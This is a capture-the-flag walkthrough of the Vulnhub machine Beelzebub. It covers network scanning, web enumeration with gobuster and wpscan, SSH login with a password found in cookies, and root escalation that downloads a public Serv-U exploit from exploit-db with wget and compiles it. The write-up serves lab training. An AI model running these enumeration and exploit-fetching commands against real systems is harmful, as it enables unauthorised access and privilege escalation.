Beelzebub is an easy machine from Vulnhub. This machine requires careful observation of everything. Talking about the machine, I have tested this on VMWare. Furthermore, performing huge bruteforcing can take the machine offline. So, be careful with that. The author of the machine is Shaurya Sharma. “Beelzebub Writeup – Vulnhub – Walkthrough”
Link to the machine: https://www.vulnhub.com/entry/beelzebub-1,742/
Identify the target
As usual, we have to find the IP address of the target machine.
sudo netdiscover -r 192.168.19.0/24
Scan open ports
Next, I scanned open ports on the machine that we can interact with.
nmap -v -T4 -sC -sV -p- -oN nmap.log 192.168.19.138
Here, we just have port 80 to enumerate further.
Enumerate the webserver
The default page has a default page from Apache.
As we know that index.html takes precedence over index.php. Hence, we can try hitting the index.php file.
The index.php page looks like a 404 returned by the Apache server. However, this is wrong by 2 points. Firstly, the version mentioned on this page is 2.4.30. But, in nmap scan results or the HTTP server header, this is 2.4.29.
Similarly, we also see the IP address of the server in case of a real error 404 as evident from the screenshot below.
Thus, it is always important to validate what we see on a page. Furthermore, we can also validate this by running a gobuster scan on the server. Anyway, let’s check the source of the page.
Here, we see a text and a hashing algorithm. So, we can generate the md5 hash of the word. We can do this using Linux or any online tool.
echo -n beelzebub | md5sum
However, tried this checksum to log into the SSH server for a username Beelzebub. But this didn’t work. Finally, using this string as a path in the server responded by hitting another request.
So, I enumerated the paths using gobuster.
gobuster dir -u http://192.168.19.138/d18e1e22becbd915b45e0e655429d487/ --wordlist=/usr/share/seclists/Discovery/Web-Content/common.txt -o dir-md5.txt
There is a problem that the browser redirects the requests to a non-existent IP address. Anyway, we know that the application has a WordPress CMS. Hence, we can try using “wpscan”.
Enumerate using wpscan
Because of the redirection, we have to add two switches on the command as follows.
wpscan --api-token $WPSCAN_KEY --url http://192.168.19.138/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force
From the result, we got two usernames on WordPress. I just don’t want to bruteforce, because it’s going to disconnect the VM. For WordPress, we can check if directory browsing is enabled by improper configuration in .htaccess. One important directory is /wp-content/uploads.
Here, we can see an unusual directory on uploads. Inside the directory, we see another website.
Once again, I enumerated the site. Here, we have a password in the cookies.
We can log into the user krampus by using the password.
Root privilege escalation
The root privilege escalation is a bit tricky. I think, for this reason, this machine should be considered as a mediumly difficult machine. There is a file “Serve-U-Tray.conf” file on the home directory.
While searching the internet, I found that Serve-U is an file server. Similarly, it also has an exploit. I could confirm this by checking the bash history of the user.
However, I couldn’t confirm the version. So, if you have any ideas, please leave a comment. Anyway, I proceeded with the exploit.
wget https://www.exploit-db.com/download/47009 -O exploit.c
gcc exploit.c -o exploit
A thank note
I would like to thank InfoSecLab for providing me with a hint on the foothold. Be sure to check his video on this machine.